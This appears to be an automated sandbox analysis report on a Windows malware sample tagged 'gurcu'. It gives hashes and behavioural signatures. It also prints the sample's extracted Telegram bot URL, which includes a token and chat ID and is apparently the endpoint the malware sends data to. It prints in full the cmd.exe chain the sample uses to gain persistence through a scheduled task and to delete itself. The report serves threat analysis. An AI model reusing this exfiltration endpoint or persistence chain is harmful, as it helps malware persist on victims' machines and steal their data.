Resubmissions
10-04-2024 02:52
240410-dcqxlaff2v 1010-04-2024 02:52
240410-dcqltscc72 1010-04-2024 02:51
240410-dcm6pscc67 1010-04-2024 02:51
240410-dcmj6scc66 1014-10-2023 04:10
231014-erhp7sga6y 10Analysis
-
max time kernel
7s -
max time network
13s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-04-2024 02:52
Behavioral task
behavioral1
Sample
f21559ac7c67d871d4f05.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f21559ac7c67d871d4f05.exe
Resource
win10-20240319-en
Behavioral task
behavioral3
Sample
f21559ac7c67d871d4f05.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
f21559ac7c67d871d4f05.exe
Resource
win11-20240214-en
General
-
Target
f21559ac7c67d871d4f05.exe
-
Size
327KB
-
MD5
78fd6df30f791c7b5f45dca0b4c952a5
-
SHA1
d977ca82da0850eb5d4e69c9c657d1a41fb9c44d
-
SHA256
dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129
-
SHA512
abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d
-
SSDEEP
6144:Vc6sWfGY/yODx332tOIXlU1QWZxXAnuHW9bbGDwVdqe1mM:Ps+CXIAuGG8dA
Malware Config
Extracted
gurcu
https://api.telegram.org/bot5968091729:AAHVag_ncx5c5AIYERGTqv9kr7clJT1_HDU/sendMessage?chat_id=-1001962300376
Signatures
-
Deletes itself 1 IoCs
pid Process 2780 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2648 f21559ac7c67d871d4f05.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2736 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2592 PING.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2036 f21559ac7c67d871d4f05.exe Token: SeDebugPrivilege 2648 f21559ac7c67d871d4f05.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2036 wrote to memory of 2780 2036 f21559ac7c67d871d4f05.exe 28 PID 2036 wrote to memory of 2780 2036 f21559ac7c67d871d4f05.exe 28 PID 2036 wrote to memory of 2780 2036 f21559ac7c67d871d4f05.exe 28 PID 2780 wrote to memory of 2484 2780 cmd.exe 30 PID 2780 wrote to memory of 2484 2780 cmd.exe 30 PID 2780 wrote to memory of 2484 2780 cmd.exe 30 PID 2780 wrote to memory of 2592 2780 cmd.exe 31 PID 2780 wrote to memory of 2592 2780 cmd.exe 31 PID 2780 wrote to memory of 2592 2780 cmd.exe 31 PID 2780 wrote to memory of 2736 2780 cmd.exe 32 PID 2780 wrote to memory of 2736 2780 cmd.exe 32 PID 2780 wrote to memory of 2736 2780 cmd.exe 32 PID 2780 wrote to memory of 2648 2780 cmd.exe 33 PID 2780 wrote to memory of 2648 2780 cmd.exe 33 PID 2780 wrote to memory of 2648 2780 cmd.exe 33 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe"C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2484
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2592
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2736
-
-
C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
327KB
MD578fd6df30f791c7b5f45dca0b4c952a5
SHA1d977ca82da0850eb5d4e69c9c657d1a41fb9c44d
SHA256dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129
SHA512abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d